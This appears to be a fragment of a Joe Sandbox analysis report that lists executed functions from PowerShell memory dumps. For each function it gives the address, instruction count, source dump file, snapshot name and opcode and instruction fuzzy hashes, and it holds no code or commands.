                                                                                                                                                                                • Instruction ID: 51253c7c5b0921b3aef22e48cb5fb9cc213d7464ecc5a4a2105b93d59aaadb1a
                                                                                                                                                                                • Opcode Fuzzy Hash: b2a7b1f44a79f8556a83655099b23a40e9a133b3e0198a59266a9d13e26c5493
                                                                                                                                                                                • Instruction Fuzzy Hash: 9621E23060D9095FEB4CEA1CD8459B677D0FBA9360B1401BED84AC7242DE22FC82C785
                                                                                                                                                                                Function 00007FF848E750E5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.2337896425.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_7ff848e70000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                • Instruction ID: 22a0799654b5678196981b115be33a21fe9c44e2b1f7f06b4daefade685b6cda
                                                                                                                                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                • Instruction Fuzzy Hash: D801677111CB0C8FDB44EF0CE451AAAB7E0FB95364F10056DE58AC3691D736E882CB45

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 00007FF848F32A25 Relevance: .4, Instructions: 436COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.2450063277.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ebdc27f5001d1807991f4f57f8050a8a0c7fa151800707eafa81fb6b85d4810b
                                                                                                                                                                                • Instruction ID: 2b37f60ba37e54bf12a055bba4a3adf001998e542dda42d61119a707a7aacd06
                                                                                                                                                                                • Opcode Fuzzy Hash: ebdc27f5001d1807991f4f57f8050a8a0c7fa151800707eafa81fb6b85d4810b
                                                                                                                                                                                • Instruction Fuzzy Hash: D0D14631E0EA8A5FEBA9AB6898155B57BE0FF56391F1800FBD04CC71D3DB28A805C355
                                                                                                                                                                                Function 00007FF848E633B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.2449382018.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ff848e60000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                • Instruction ID: bc0586010bb7648f8a9788ff2eea40288e3a4c6b570a1a89675a5d11dfb431f3
                                                                                                                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                • Instruction Fuzzy Hash: CC01A73010CB0D4FDB44EF0CE051AA6B3E0FB85360F10052DE58AC3651DB32E882CB45

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 00007FF848F52A2A Relevance: .4, Instructions: 436COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000013.00000002.2591686944.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_19_2_7ff848f50000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6c6fed454cdbe337187363c48d38dbb2c166a6e47858a4f137e21c8646f999a1
                                                                                                                                                                                • Instruction ID: 097248fa0c5bf6dad97b6f7c563a2786d0df85eb9eb79bfd1725bd1436ef3c79
                                                                                                                                                                                • Opcode Fuzzy Hash: 6c6fed454cdbe337187363c48d38dbb2c166a6e47858a4f137e21c8646f999a1
                                                                                                                                                                                • Instruction Fuzzy Hash: 0FD11531E1EA8A5FE799EB6858655B5BBE0FF16350F0802FAD00DC71D3DB28A805C355
                                                                                                                                                                                Function 00007FF848E833B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000013.00000002.2590872449.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_19_2_7ff848e80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                • Instruction ID: a525311bf5e0898e04d495dce5ac7619facc0d09e4621ee5b042099af78d6db2
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                • Instruction Fuzzy Hash: E701677111CB0D4FDB44EF0CE451AAAB7E0FB95364F50056DE58AC3651DB36E882CB45

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 00007FF848E833B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2848365817.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff848e80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                • Instruction ID: a525311bf5e0898e04d495dce5ac7619facc0d09e4621ee5b042099af78d6db2
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                • Instruction Fuzzy Hash: E701677111CB0D4FDB44EF0CE451AAAB7E0FB95364F50056DE58AC3651DB36E882CB45